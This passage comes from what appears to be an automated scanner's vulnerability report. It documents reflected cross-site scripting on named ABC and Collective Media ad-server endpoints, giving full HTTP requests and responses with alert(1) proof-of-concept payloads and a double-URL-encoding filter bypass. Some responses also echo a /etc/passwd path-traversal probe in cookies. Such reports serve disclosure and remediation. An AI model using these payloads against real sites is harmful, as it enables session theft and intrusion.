- http://ar.voicefive.com/bmx3/broker.pli [UID cookie]
- http://ar.voicefive.com/bmx3/broker.pli [ar_p110620504 cookie]
- http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]
- http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]
- http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]
- http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [ZEDOIDA cookie]
- http://livechat.iadvize.com/chat_init.js [vuid cookie]
- http://s19.sitemeter.com/js/counter.asp [IP cookie]
- http://s19.sitemeter.com/js/counter.js [IP cookie]
- http://www.websitealive2.com/89/visitor/vTrackerSrc_v2.asp [wsa cookie]
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:- Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
- User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
4.1. http://a.abc.com/service/gremlin/js/files/ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleter.js [REST URL parameter 5]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.abc.com |
| Path: |
/service/gremlin/js/files/ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleter.js |
Issue detail
The value of REST URL parameter 5 is copied into a JavaScript inline comment. The payload aa5fa%252a%252falert%25281%2529%252f%252f0f95b5b210d was submitted in the REST URL parameter 5. This input was echoed as aa5fa*/alert(1)//0f95b5b210d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /service/gremlin/js/files/ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleter.jsaa5fa%252a%252falert%25281%2529%252f%252f0f95b5b210d?cb=v9.00 HTTP/1.1
Host: a.abc.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK
Content-Length: 145111
Content-Type: text/javascript
Last-Modified: Sat, 17 Sep 2011 01:02:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed10
X-Powered-By: ASP.NET
Cache-Expires: Sat, 17 Sep 2011 02:02:31 GMT
X-UA-Compatible: IE=EmulateIE7
Cache-Control: max-age=272
Date: Sat, 17 Sep 2011 01:02:32 GMT
Connection: close
/**
* @filepath: ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleteraa5fa*/alert(1)//0f95b5b210d
* @created: Fri, 16 Sep 11 18:02:32 -0700
*/
/**
* @filepath: /utils/jquery.ifixpng2.js
* @created: Fri, 16 Sep 11 18:02:31 -0700
*/
;(function($){$.ifixpng=function(customPixel){$.ifixpng.pixel=cu
...[SNIP]...
|
4.2. http://a.abc.com/service/sfp/omnitureconfig/ [pageURL parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.abc.com |
| Path: |
/service/sfp/omnitureconfig/ |
Issue detail
The value of the pageURL request parameter is copied into the XML document as plain text between tags. The payload f23fc<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>8491a57dfb1 was submitted in the pageURL parameter. This input was echoed as f23fc<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>8491a57dfb1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Request
GET /service/sfp/omnitureconfig/?pageId=4dc00ac0_f316_48f9_bbbc_df7e9b2d0b9b&showId=SH014193940000&pageURL=http://beta.abc.go.com/shows/charlies-angelsf23fc<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>8491a57dfb1 HTTP/1.1
Host: a.abc.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK
Content-Length: 1037
Content-Type: text/xml
Last-Modified: Sat, 17 Sep 2011 01:03:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed04
X-Powered-By: ASP.NET
Cache-Expires: Sat, 17 Sep 2011 02:03:32 GMT
X-UA-Compatible: IE=EmulateIE7
Cache-Control: max-age=279
Date: Sat, 17 Sep 2011 01:03:31 GMT
Connection: close
<?xml version="1.0" encoding="UTF-8" ?>
<omnitureProfile account="wdgabccom" visitorNamespace="abc" trackingServer="w88.go.com" trackingServerSecure="sw88.go.com" dc="112">
<param id="prop13" value="
...[SNIP]...
<param id="pageURL" value="http://beta.abc.go.com/shows/charlies-angelsf23fc<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>8491a57dfb1" enabled="true" />
...[SNIP]...
|
4.3. http://a.collective-media.net/adj/cm.rev_bostonherald/ [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.collective-media.net |
| Path: |
/adj/cm.rev_bostonherald/ |
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f413'-alert(1)-'1042a85aca3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/cm.rev_bostonherald2f413'-alert(1)-'1042a85aca3/;sz=728x90;ord=%23PCACHEBUSTER? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 458
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:48:57 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:48:57 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/cm.rev_bostonherald2f413'-alert(1)-'1042a85aca3/;sz=728x90;net=cm;ord=%23PCACHEBUSTER;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
|
4.4. http://a.collective-media.net/adj/cm.rev_bostonherald/ [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.collective-media.net |
| Path: |
/adj/cm.rev_bostonherald/ |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9849'-alert(1)-'3c99bede0bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/cm.rev_bostonherald/;sz=728x90;ord=%23PCACHEBUSTER?&b9849'-alert(1)-'3c99bede0bf=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 462
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:48:55 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:48:55 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/cm.rev_bostonherald/;sz=728x90;net=cm;ord=%23PCACHEBUSTER?&b9849'-alert(1)-'3c99bede0bf=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
|
4.5. http://a.collective-media.net/adj/cm.rev_bostonherald/ [sz parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.collective-media.net |
| Path: |
/adj/cm.rev_bostonherald/ |
Issue detail
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3030f'-alert(1)-'78b5323d0b7 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/cm.rev_bostonherald/;sz=728x90;ord=%23PCACHEBUSTER?3030f'-alert(1)-'78b5323d0b7 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 459
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:48:47 GMT
Connection: close
Set-Cookie: dc=sea-dc7a1d176d1cb6ad6c2dd07ed8; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:48:47 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/cm.rev_bostonherald/;sz=728x90;net=cm;ord=%23PCACHEBUSTER?3030f'-alert(1)-'78b5323d0b7;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
|
4.6. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.collective-media.net |
| Path: |
/adj/iblocal.revinet.bostonherald/audience |
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86817'-alert(1)-'7a10fc56168 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/iblocal.revinet.bostonherald86817'-alert(1)-'7a10fc56168/audience;sz=160x600;ord=%23PCACHEBUSTER? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 17 Sep 2011 01:13:10 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:13:10 GMT
Content-Length: 482
var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald86817'-alert(1)-'7a10fc56168/audience;sz=160x600;net=iblocal;ord=%23PCACHEBUSTER?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
|
4.7. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [REST URL parameter 3]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.collective-media.net |
| Path: |
/adj/iblocal.revinet.bostonherald/audience |
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3b3a'-alert(1)-'ebe641e9daf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/iblocal.revinet.bostonherald/audiencea3b3a'-alert(1)-'ebe641e9daf;sz=160x600;ord=%23PCACHEBUSTER? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/1.0.5
Date: Sat, 17 Sep 2011 01:13:16 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:13:16 GMT
Content-Length: 482
var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audiencea3b3a'-alert(1)-'ebe641e9daf;sz=160x600;net=iblocal;ord=%23PCACHEBUSTER?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
|
4.8. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.collective-media.net |
| Path: |
/adj/iblocal.revinet.bostonherald/audience |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 787bc'-alert(1)-'bb972807ee4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/iblocal.revinet.bostonherald/audience;sz=160x600;ord=%23PCACHEBUSTER?&787bc'-alert(1)-'bb972807ee4=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/1.0.5
Date: Sat, 17 Sep 2011 01:13:02 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:13:02 GMT
Content-Length: 485
var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience;sz=160x600;net=iblocal;ord=%23PCACHEBUSTER?&787bc'-alert(1)-'bb972807ee4=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
|
4.9. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [sz parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.collective-media.net |
| Path: |
/adj/iblocal.revinet.bostonherald/audience |
Issue detail
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48284'-alert(1)-'1a524591d7c was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/iblocal.revinet.bostonherald/audience;sz=160x600;ord=%23PCACHEBUSTER?48284'-alert(1)-'1a524591d7c HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 17 Sep 2011 01:13:00 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=sea-dc7a1d176d75a886b936744456; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:13:00 GMT
Content-Length: 482
var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience;sz=160x600;net=iblocal;ord=%23PCACHEBUSTER?48284'-alert(1)-'1a524591d7c;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
|
4.10. http://a.collective-media.net/adj/q1.bosherald/be_news [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.collective-media.net |
| Path: |
/adj/q1.bosherald/be_news |
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ae82'-alert(1)-'477998e8ab0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.bosherald3ae82'-alert(1)-'477998e8ab0/be_news;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/2118037356/Middle1/BostonHerald/quadrant1_newsROS300x250b_2010/quadrant1_newsROS300x250b_2010.html/4d686437616b35776e72734144666853?;ord=2118037356? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 455
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:09:46 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:09:46 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald3ae82'-alert(1)-'477998e8ab0/be_news;sz=300x250;net=q1;ord=2118037356?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
|
4.11. http://a.collective-media.net/adj/q1.bosherald/be_news [REST URL parameter 3]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.collective-media.net |
| Path: |
/adj/q1.bosherald/be_news |
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac83b'-alert(1)-'4a7cc732c20 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
